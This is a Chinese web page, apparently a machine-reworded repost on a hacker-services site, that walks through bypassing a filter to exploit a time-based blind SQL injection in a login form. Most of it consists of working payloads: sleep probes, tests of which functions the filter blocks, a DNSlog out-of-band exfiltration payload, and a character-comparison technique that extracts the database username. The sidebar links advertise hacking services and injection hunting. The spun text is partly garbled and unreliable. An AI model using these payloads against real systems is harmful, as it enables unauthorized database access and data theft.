安全生产技术｜一次众测实战演练sql注入绕开

访客4年前 (2021-02-27)关于黑客接单1195

SQL注入即就是指web应用程序流程对客户键入数据信息的合理合法沒有分辨或过虑关不紧， *** 攻击能够在web应用程序流程中事前界定好的查看句子的末尾上加上附加的SQL句子，在管理人员不知道的状况下完成操作错误，为此来完成蒙骗数据库查询 *** 服务器实行非受权的随意查看，进而进一步获得相对的数据信息。文中由锦行高新科技的安全性科学研究精英团队出示，致力于协助顾客了解sql注入绕开的难题。

在一次检测全过程中，发觉登录框的用户名处存有廷时注入。

打开bp抓包软件，随意键入用户名和登陆密码，点一下登录，抓到下列数据文件

经检测，Uname主要参数存有sql廷时注入

在后面再加上

'and(select*from(select sleep(5))a)and'a'='

发觉延迟10秒

在后面再加上

'and(select*from(select sleep(3))a)and'a'='

发觉延迟6秒

依据上边图得知,sleep(5)时，回显時间为10秒；sleep(3)时，回显時间为6秒，显著存有sql注入，猜想数据库查询干了2次查看或是查到两根同样的数据信息。

再明确存有注入点以后，以后应用sqlmap来跑数据信息，发觉没法成功注入，很有可能存有拦截或是过虑。因此只能依靠手工 *** 去检测发现问题。

a. 应用'and(select*from(select sleep(if(1=1,1,3)))a)and'a'='去检测，发觉延迟2秒，表明if函数沒有被拦截

b. 再次应用'and(select*from(select sleep(if(user()='a',1,3)))a)and'a'='去检测，发觉延迟六秒，表明user涵数沒有被拦截

c. 再次应用'and(select*from(select sleep(if(substr(user(),1,1)='a',1,3)))a)and'a'='去检测，发觉没延迟，表明substr被拦截了，然后我应用mid、substring来更换substr涵数均被拦截

d. 再次应用'and(select*from(select sleep(if(user() like 'a%',1,3)))a)and'a'='去检测，发觉没延迟，表明mid、substring、like被拦截了

见到这种重要涵数都没拦截了，根据if断开的方式来检测是要凉了，那么就试试根据dnslog携带的 *** 把数据信息给带出来。

e. 应用payload:'and(select*from(select sleep(load_file(concat('//',(select user()),'.xxx.dnslog.cn/abc'))))a)and'a'='，发觉dnslog服务平台也没反应

最终历经各种各样检测，发觉根据逐字母较为ascii码的方式能绕开上边上述的编码层的拦截，因此要用以下这类方式绕开。

实际注入payload以下：

'and(select*from(select sleep(if(user()>'d',3,0)))a)and'a'='

用以上payload的意思是较为用户名的之一位的ascii码是否超过或是相当于d的ascii码

Ascii时速表以下：

在数据库查询中检测：

先后从左往右较为ascii码，例如拿select ‘rooT’>’ro’而言，由于他们两的前俩位相同，会较为到第三位，rooT的第三位为o,而ro的第三位是空，因此rooT自然超过ro。

依据上边状况，大家分辨用户名之一位字母的情况下，能够分成以下3步

流程一：

payload:

'and(select*from(select sleep(if(user()>'c',3,0)))a)and'a'=' ,

延迟为6秒，表明为true，用户名的之一位字母的ascii码相匹配大于或等于c字母的ascii码，即大于或等于99

流程二:

当payload为

'and(select*from(select sleep(if(user()>'d',3,0)))a)and'a'=' ,

延迟为6秒，表明也为true，用户名的之一位字母的ascii码相匹配大于或等于d字母的ascii码，即大于或等于100

流程三：

当payload为'and(select*from(select sleep(if(user()>'e',3,0)))a)and'a'=' ,

延迟为0秒，表明为false，用户名的之一位字母的ascii码相匹配低于e字母的ascii码，即低于101

最终依据結果剖析：

依据流程二，用户名之一位字母的ascii码超过或是相当于100；

依据流程三,用户名的之一位字母的ascii码低于101，

最终得到用户名之一位字母的ascii码为100，即字母d.

依次类推，最终得到用户名为dctok

标签: 安全技术｜一次众测实战sql注入绕过

返回列表

上一篇：猴子捞月亮的故事寓意（猴子捞月的故事及给人的启发）

下一篇：记忆卡数据恢复

相关文章

中国好声音停播一周原因揭晓，歌迷们都等不及

中国好声音停播一周原因揭晓，歌迷们都等不及

浙江卫视《中国好声音》上周刚刚开播，今天就有网友爆料中国好声音本周将停播一周，本周五、周六浙江卫视黄金档预计播出《神奇伙伴在哪里》。那好声音为什么停播呢？据悉是因为第一期播出了查几个月满十...

十二个月的雅称（十二个月份的各种别称，涨知识了）

十二个月的雅称（十二个月份的各种别称，涨知识了）月是历法中的一种时间单位，传统上都是以月相变化的周期作为一个月的长度，一个月（太阴月）的长度大约是29.53日，即一轮“朔望月”。在旧石器时代的...

黑客新闻,在哪里找专业的黑客6,找百度黑客寄生虫推广

a、白名单inurl:.php?id=MTM=仿制代码很怪？其实不怪，便是这样的，如图：（通过测验，这个页面上的网址99%是注入点，这儿面又有一半能够拿到Webshell，拿到Webshell的又有五...

手机系统是否黑客能进入的简单介绍

手机系统是否黑客能进入的简单介绍

本文目录一览： 1、手机能被黑客入侵吗？ 2、怎么判断手机有黑客 3、vivo手机会被黑客入侵吗 4、黑客能入侵用户手机吗？用户进行什么操作他都了如指掌吗？ 5、手机打开了数据网就能被...

宁丹琳博客(家有儿女宁丹琳)

剧组回答是:从杨紫自身来说,未能继续参与拍摄第三部主要的原因是由于档期及学习的压力。另外在充分考虑了几个现有。宁丹琳英文名:Christina生日:1987年3月23日语言:普通话身高:167cm体...

兰州商务联系方式 -真实靠谱

甘肃商务联系电话-真正可靠性別：女士 ID：16281 年纪：20 个子：175 品牌形象：丰腴手机微信：VIP可查询美特号：茜茜女学妹预定：VIP可查询時间：看自身時间而定全职的做兼职：...